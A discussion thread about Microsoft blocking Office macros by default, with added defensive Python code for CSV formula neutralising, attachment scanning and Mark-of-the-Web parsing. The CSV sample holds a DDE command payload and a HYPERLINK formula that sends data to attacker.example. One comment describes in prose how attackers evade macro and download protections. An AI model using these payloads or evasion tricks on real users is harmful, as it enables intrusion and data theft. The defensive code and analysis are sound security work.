Microsoft's Small Step to Disable Macros Is a Win for Security

  • Relatedly, I was recently horrified to learn that not only will Excel (and LibreOffice Calc) automatically parse formulas in plain CSV files, but there is also a formula that will _run external programs_.
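
    The formula parsing described above is what makes "CSV injection" a real export-side bug. As an added example, not code from the original thread, here is a small neutraliser and scanner for user-controlled values headed for a CSV that someone will open in Excel or Calc. It uses only the Python standard library; the sample rows (including the well-known OWASP DDE payload) are constructed for the demonstration.

```python
# Added example (not from the original thread): detect and neutralise
# spreadsheet formula injection in CSV cells before export.
# Uses only the Python standard library; sample rows below are constructed.
import csv
import io
import re

# Leading characters that Excel / LibreOffice Calc treat as the start of a
# formula, plus tab and CR, which can smuggle one past a naive first-char check.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain numbers such as "-5" or "+3.25" are legitimate; only a sign followed
# by something non-numeric is treated as a formula candidate.
_NUMBER_RE = re.compile(r"^[+-]?\d+(\.\d+)?([eE][+-]?\d+)?$")


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would interpret this cell as a formula."""
    if not cell or _NUMBER_RE.match(cell):
        return False
    return cell[0] in FORMULA_TRIGGERS


def neutralise_cell(cell: str) -> str:
    """Prefix a formula-like cell with a single quote so the spreadsheet
    shows it as text. Delimiter/quote escaping is left to the csv writer."""
    return "'" + cell if is_formula_like(cell) else cell


def export_csv(rows, neutralise: bool = True) -> str:
    """Write rows as CSV text, quoting every field; neutralise=False shows
    what an unprotected export looks like."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        cells = [str(c) for c in row]
        if neutralise:
            cells = [neutralise_cell(c) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


def scan_csv(text: str):
    """Audit existing CSV text: return (row, col, cell) for every cell a
    spreadsheet would evaluate, e.g. before opening an untrusted file."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample: the classic DDE payload documented by OWASP, a
# HYPERLINK exfiltration attempt, signed numbers, and ordinary text.
SAMPLE_ROWS = [
    ["name", "balance", "note"],
    ["=cmd|' /C calc'!A0", "-5", "Alice"],
    ["Bob", "+3.25", '=HYPERLINK("http://attacker.example/?"&A1,"click")'],
    ["@SUM(A1:A2)", "0", "carol"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
    print("formula-like cells in raw export:",
          scan_csv(export_csv(SAMPLE_ROWS, neutralise=False)))
```

    The apostrophe prefix is visible to anyone who reads the CSV in a text editor or re-imports it programmatically, so apply it only on the export path that feeds a spreadsheet, and keep the number exception in mind: a policy that blindly escapes every leading "-" will mangle negative balances.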

  • That's not the right move. The right move would be a sandbox around every Word/Excel file being viewed/opened. Ideally, backed by a kernel mechanism such as the CreateRestrictedToken WinAPI.

    What they are doing instead is shifting responsibility to end users. Specifically, they're simply training users to click on "I agree" buttons.

  • There's a really great history on this here:

    https://insights.sei.cmu.edu/blog/who-needs-to-exploit-vulne...

    In summary, each successive version of Office actually walked back the tone of the warning if you tried to enable macros. Office 2000 was still more strict than what we'll have after this change. Office 2010 reduced it to the one yellow bar and a single click enable.

    Edit: For those reading, this has been something of an embarrassment for a while. The creator of mimikatz only just made this callout in response to Microsoft's security advertising:

    https://nitter.net/gentilkiwi/status/1488937687281242116#m

    Further edit:

    There's a statement regarding the scale of this change here: https://nitter.net/GossiTheDog/status/1490740535849623552#m

  • I'm not sure what is really going on here. Macros have been disabled by default for many years now. Is this article from fifteen years ago?

  • Macros are less commonly used as an attack vector for initial access nowadays. Sure they’ll make it harder for macros, but still is possible to run a one-click attack by attaching a js, jse, hta, paf, ws, wsf, scr, etc. to an email.
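
    The extension list in the comment above is the kind of thing a mail gateway or a triage script checks. As an added example, not code from the original thread, here is a small attachment scanner that flags one-click script and shortcut types, handles double extensions such as invoice.pdf.js, and looks inside zip attachments (reporting encrypted members rather than skipping them). It uses only the Python standard library; the extension set is a starting point rather than a complete policy, and the attachments are constructed in memory.

```python
# Added example (not from the original thread): flag e-mail attachments whose
# names, or whose zip contents, carry extensions that run with one click on
# Windows. Standard library only; sample attachments are constructed below.
import io
import re
import zipfile

# Extensions from the comment above plus a few other common one-click types.
# This is illustrative, not an exhaustive policy.
ONE_CLICK_EXTENSIONS = {
    "js", "jse", "hta", "pif", "ws", "wsf", "wsh", "scr", "vbs", "vbe",
    "cmd", "bat", "com", "exe", "lnk", "msi", "ps1", "cpl", "iso", "img",
}
ARCHIVE_EXTENSIONS = {"zip"}  # only zip is parsed; iso/img are flagged outright


def effective_extensions(name: str):
    """All extensions of the final path component, lower-cased, so
    'invoice.pdf.js' -> ['pdf', 'js']. Trailing dots/spaces are stripped
    because Windows ignores them when resolving the handler."""
    base = re.split(r"[/\\!]", name)[-1].rstrip(". ")
    parts = base.split(".")
    return [p.lower() for p in parts[1:]] if len(parts) > 1 else []


def is_one_click(name: str) -> bool:
    exts = effective_extensions(name)
    return bool(exts) and exts[-1] in ONE_CLICK_EXTENSIONS


def scan_attachment(name: str, data: bytes, depth: int = 0, max_depth: int = 3):
    """Return (path, reason) findings for one attachment. Zip archives are
    opened in memory and their members scanned recursively up to max_depth;
    encrypted members are reported, since password-protected archives are a
    common way past mail filters. Nested members are named 'outer.zip!inner'."""
    findings = []
    if is_one_click(name):
        findings.append((name, "one-click extension"))
    exts = effective_extensions(name)
    if exts and exts[-1] in ARCHIVE_EXTENSIONS and depth < max_depth:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    member = f"{name}!{info.filename}"
                    if info.flag_bits & 0x1:  # general-purpose bit 0: encrypted
                        findings.append((member, "encrypted archive member"))
                        continue
                    findings.extend(
                        scan_attachment(member, zf.read(info), depth + 1, max_depth)
                    )
        except zipfile.BadZipFile:
            findings.append((name, "archive extension but not a valid zip"))
    return findings


def scan_message(attachments):
    """attachments: iterable of (filename, bytes). Returns all findings."""
    return [f for name, data in attachments for f in scan_attachment(name, data)]


def build_sample_zip() -> bytes:
    """Constructed sample: a zip holding a double-extension script and a
    harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2022.pdf.js", "WScript.Echo('constructed sample');")
        zf.writestr("readme.txt", "nothing to see")
    return buf.getvalue()


# Constructed sample message: one benign document, one HTA, one zip.
SAMPLE_ATTACHMENTS = [
    ("quarterly_report.docx", b"constructed docx bytes"),
    ("payment details.hta", b"<html></html>"),
    ("documents.zip", build_sample_zip()),
]

if __name__ == "__main__":
    for path, reason in scan_message(SAMPLE_ATTACHMENTS):
        print(f"{reason}: {path}")
```

    Extension matching is a cheap first filter, not a verdict: it says nothing about a macro-bearing .docm or .xlsm, and ISO/IMG containers are only flagged by name because the standard library cannot open them. The recursion bound exists so that a zip-bomb style nesting cannot make the scanner spin.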

  • Huh. My work computers have always disabled macros, regardless of the file source. I guess this was a corporate configuration that's just now becoming default in the consumer versions.

  • For what it's worth TeX/LaTeX allows execution of arbitrary shell commands from *.tex documents. Be careful there as well.

  • They say: "Windows marks files you download with a metadata attribute known as “Mark of the Web” or “zone.identifier.”". Where is this metadata written and at which point?

    Does adding this metadata mess up the checksum or digital signature?
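
    To the two questions above: the mark is written by whatever application saves the download (browser, mail client) as an NTFS alternate data stream named Zone.Identifier attached to the file, and because it is a separate stream, hashing or signing the file's data stream is unaffected. As an added example, not code from the original thread, here is a parser for that stream plus the two checks a practitioner would want: which zone a file is marked with, and that the primary-stream hash does not change. Standard library only; the ADS can only really be opened on NTFS under Windows, so the parser is exercised on a constructed copy of the stream contents. The mapping of "zone 3 or 4 blocks macros" to the change discussed on this page is my reading of Microsoft's published behaviour, stated as an assumption.

```python
# Added example (not from the original thread): read and interpret the
# Mark-of-the-Web stored in the NTFS alternate data stream
# "<file>:Zone.Identifier". Standard library only; SAMPLE_STREAM is constructed.
import hashlib
from pathlib import Path
from typing import Optional

# URLMON security zone numbers (URLZONE_*).
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style stream body. ZoneId becomes an int; other keys in
    the [ZoneTransfer] section (ReferrerUrl, HostUrl) stay strings. A missing
    or malformed ZoneId is reported as None rather than guessed."""
    result = {"ZoneId": None}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "ZoneTransfer" or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        if key == "ZoneId":
            result["ZoneId"] = int(value) if value.isdigit() else None
        else:
            result[key] = value
    return result


def zone_label(zone_id: Optional[int]) -> str:
    return ZONE_NAMES.get(zone_id, "no mark / unknown")


def office_would_block_macros(zone_id: Optional[int]) -> bool:
    """Assumption for this example: the default-block discussed on this page
    applies to files marked Internet (3) or Restricted Sites (4); unmarked,
    local and intranet files are not affected by it."""
    return zone_id in (3, 4)


def read_mark_of_the_web(path: Path) -> Optional[dict]:
    """Open the alternate data stream directly. Returns None when the stream
    does not exist or the filesystem has no ADS support (e.g. Linux, where
    this just looks for a file literally named 'x:Zone.Identifier')."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:
        return None


def primary_stream_sha256(path: Path) -> str:
    """Hash of the unnamed (data) stream only. Adding or removing the
    Zone.Identifier stream does not change this value, so file checksums and
    Authenticode signatures over the content are unaffected by the mark."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


# Constructed sample of what a browser writes for a download.
SAMPLE_STREAM = """[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://mail.example.test/
HostUrl=https://files.example.test/report.xlsm
"""

if __name__ == "__main__":
    mark = parse_zone_identifier(SAMPLE_STREAM)
    print(mark, zone_label(mark["ZoneId"]), office_would_block_macros(mark["ZoneId"]))
```

    On a Windows box the same stream is visible with `Get-Content .\report.xlsm -Stream Zone.Identifier`, all streams with `Get-Item .\report.xlsm -Stream *`, and `Unblock-File` deletes it; `Get-FileHash` before and after `Unblock-File` returns the same hash, which is the practical answer to the checksum question. Note that the mark survives copies within NTFS but is lost when the file passes through a filesystem with no ADS support.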

  • Sounds like they're just making the macros harder to enable: you need to check a box under file properties.

    I guess the "do you want to enable macros" bar wasn't enough discouragement.

  • How does iOS deal with it?

  • Doubt. Quite a bit to unpack here lol.

    First of all, are Outlook attachments even marked as internet zone? Ok, let's say they are. What if they are in a zip file? With exes you have to click a few times through a warning dialog to run them when downloaded from the internet, but guess what... not if you stuff them in an ISO. Works reliably too.

    Ok, let's say they are disabling macros by default... is it just the orgs I worked at that set this as a default? Because I thought you had to enable editing and then enable macros each time? From a corporate security perspective, an Office document with a malicious macro almost never gets past email security appliances.

    There are two things true about a significant portion of the user population (even most seasoned security folks, and myself as well, having had to work in this specific area for 5+ years): 1) Users will download untrusted files and open them. 2) A much smaller but significant number of users will click through any number of warnings and obstacles to get content to work, because at that point, to them, it is trusted content. It isn't phishing: Bob at so-and-so company, who they work with regularly, sent this important document (little do they know, Bob's account is pwned).

    Already, you have to work very hard and target a large enough population for the law of averages to work in your favor as an attacker. Defender has gotten really good, even with just the default settings (and much, much more with cloud submission), at behavioral detections in this area as well. The majority of successful compromises I've responded to or read about involving Office docs have been Excel 4.0 macros, not VBA macros.

    Here is a thing about modern O365: it's very web-centric. It is very common to open Office docs in the browser Office app or with a layer of OneDrive or SharePoint first. You know what reliably gets past the most hardened email security appliances and tricks the majority of users? Put your content in a zip or ISO (preferably encrypt it and send the code in the email, because it is all so important and confidential), put it in OneDrive or SharePoint and share it with a small but significant population (per compromised or staged+verified account); they will get a very convincing email from O365.

    If I really had to stick to VBA macros for some reason and users can't enable macros no matter what, I would just include very convincing image-based instructions on how they should add C:\ or something as a trusted folder (4-5 clicks though). Oh, that's disabled too? Here is a neat trick attackers have been using recently: the file in a zip/rar contains a Zone.Identifier ADS stream that marks it as from a trusted zone. As far as I know, this only works because Zone.Identifier marking from embedded content isn't overridden or checked strictly.

    At the end of the day, macros are very useful and powerful. They are even adding python macros in the future. For the same reason you can unblock exe's and even powershell scripts from the internet, macros will be unblockable too and users will unblock even with multiple layers of obstacles. Remember, the legitimacy of the document is beyond question to users at that point.

    When I interview users post-incident, they have no idea what happened. They did not get any suspicious email or open any questionable document. When they are willing, I have had to get them to share their screen and go through their inbox on the day of the compromise (for personal email, since it isn't monitored), or just tell them the subject and pull it up, to which they are adamant that it is a legitimate email.

    Also remember this: the goal is not to infect most users (they would like that though) but to get a foothold on at least one device. The attackers that send this type of content are experts at delivery and execution, usually not a lot more beyond that (except maybe steal information, persist, and tamper with Defender). Their main goal is to sell access to another party who would use other malware (Cobalt Strike is popular, but less so these days) to perform manual hacking and lateral movement. It is usually 6-72 hours before the real bad guys show up.

    One more thing: SEO optimization and plain ol' JScript seem to be working reliably; groups like REvil had switched to that last year.

    In summary: this is a welcome improvement, but the game of cat and mouse must go on. Meet the new security, same as the old security. There are threat actors that mail malicious USB drives with teddy bears; just as security evolves, so will attacks.

    I only dabble with red-team stuff, but even then the initial access primitives that worked reliably a few months ago are useless now (RIP mshta+js). Red teams that have to get initial access keep this a secret protected by NDA for that reason.

    If Microsoft really wants to be a game changer, they should open up a lot more security controls to all their users, not just E5 license holders.

    Check out ASR rules; they have a few more very powerful tools like this: https://docs.microsoft.com/en-us/microsoft-365/security/defe...

  • Side note: Anyone remember when Excel 4.0 macros could not be disabled in Excel?

  • Honestly, I wonder if VBA's most effective security feature has been its bad reputation. There's so much access to inexplicably vast swaths of the Windows ecosystem, combined with a nearly perfect consensus of users who have no idea what a macro is, that it's kind of surprising that VBA hacking isn't more ubiquitous. Security through obscurity via popular loathing?